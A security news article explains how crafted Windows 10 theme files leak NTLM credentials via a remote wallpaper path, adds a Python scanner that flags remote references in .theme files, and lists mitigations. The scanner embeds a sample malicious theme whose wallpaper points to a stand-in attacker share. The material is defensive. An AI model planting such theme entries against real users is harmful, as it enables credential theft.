Windows 10 themes can be used to steal user credentials

Custom Windows 10 themes can be abused to steal user credentials. According to findings published by security researcher Jimmy Bayne (@bohops) and reported by BleepingComputer, a specially crafted theme can make a Windows 10 machine send the user’s NTLM credentials to an attacker-controlled server. The report describes this as a Pass-the-Hash attack, although what the attacker actually captures is an NTLM challenge-response that has to be cracked (or relayed), not the NT hash itself.

He noted that user-created Windows 10 themes are stored under “%AppData%\Microsoft\Windows\Themes” with a “.theme” extension. The “Save theme for sharing” option packages a theme as a “.deskthemepack” file that can be sent by email. A .theme file is a plain INI-style text file, and its wallpaper entry can point to a remote, authentication-protected resource (a UNC share or a URL) instead of a local image. When the victim applies the theme, Windows tries to fetch the wallpaper and, if the remote host demands authentication, automatically responds with the user’s login name and an NTLM challenge-response; the user does not have to type anything. The attacker captures that response and cracks it offline to recover the plaintext password.
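The check a defender would want at this point, as an added example that is not part of the original report or of Bayne’s own tooling: a small Python scanner that parses the INI-style body of a .theme file and flags any value that points off the local machine (a UNC path such as \\host\share, a WebDAV-style \\host@SSL\… path, or an http(s)/file URL). It flags every remote value rather than only the wallpaper key, on the assumption that where a path points matters more than which key carries it. The two theme bodies below are constructed for illustration; 203.0.113.5 is a documentation address standing in for an attacker host.

```python
import configparser
import re
from typing import List, Tuple

# Matches values that resolve to a remote resource: a UNC path (\\host\share or
# //host/share, which also covers WebDAV-style \\host@SSL\DavWWWRoot) or an
# http(s)/file URL. Local paths (C:\..., %SystemRoot%\...) do not match.
REMOTE_RE = re.compile(
    r"^(?:\\\\[^\\/]+[\\/]|//[^/]+/|(?:https?|file)://)",
    re.IGNORECASE,
)

# Constructed sample of a malicious .theme body (illustration only, not taken
# from the research): the wallpaper points at a share on 203.0.113.5, so
# Windows will try to authenticate to that host when the theme is applied.
MALICIOUS_THEME = r"""
[Theme]
DisplayName=Ocean Sunset

[Control Panel\Desktop]
Wallpaper=\\203.0.113.5\share\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10

[Slideshow]
ImagesRootPath=%SystemRoot%\Web\Wallpaper\Theme1
"""

# Constructed benign sample: every resource lives on the local disk.
BENIGN_THEME = r"""
[Theme]
DisplayName=Ocean Sunset

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\Web\Wallpaper\Theme1\img1.jpg
TileWallpaper=0
WallpaperStyle=10
"""


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse the INI-style body of a .theme file.

    Interpolation is disabled because values routinely contain %SystemRoot%;
    strict=False tolerates the duplicate keys some real theme files carry;
    optionxform=str keeps the key case Windows writes (e.g. 'Wallpaper').
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def find_remote_references(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every value pointing off the local machine."""
    cp = parse_theme(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if REMOTE_RE.match(value):
                hits.append((section, key, value))
    return hits


def is_suspicious(text: str) -> bool:
    """True if the theme body references any remote resource."""
    return bool(find_remote_references(text))


def load_theme_text(path: str) -> str:
    """Read a .theme file from disk; Windows writes them as UTF-16 LE (with BOM) or ANSI."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_THEME), ("benign", BENIGN_THEME)):
        hits = find_remote_references(body)
        print(f"{name}: {'SUSPICIOUS' if hits else 'clean'}")
        for section, key, value in hits:
            print(f"  [{section}] {key} -> {value}")
```

To scan a file rather than the embedded samples, pass `load_theme_text(path)` to `find_remote_references`. Note that .themepack and .deskthemepack files are cabinet (CAB) archives wrapping a .theme file plus its resources, so they must be extracted first (for example with expand.exe on Windows) before the inner .theme is scanned.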

Many Windows 10 users sign in with a Microsoft account rather than a local account, which raises the stakes: the password recovered from the captured NTLM response is then the Microsoft account password, and it also unlocks other services that authenticate with that account, such as Azure and Office.

Bayne said he reported his findings to Microsoft earlier this year, but the company declined to fix the issue, calling the behaviour a “feature by design.” As a mitigation he suggested blocking the .theme, .themepack, and .deskthemepack extensions or re-associating them with a different program. That breaks the feature, so it should be treated as a last resort: users will no longer be able to apply Windows 10 themes by opening theme files. A less disruptive hardening is to block outbound SMB (TCP 445) at the network perimeter and to enable the Group Policy setting “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers,” so the machine never sends NTLM credentials to arbitrary hosts on the Internet; the policy matters more than the port block, because a theme can also point at a WebDAV/HTTP resource that carries NTLM over ports 80 and 443.
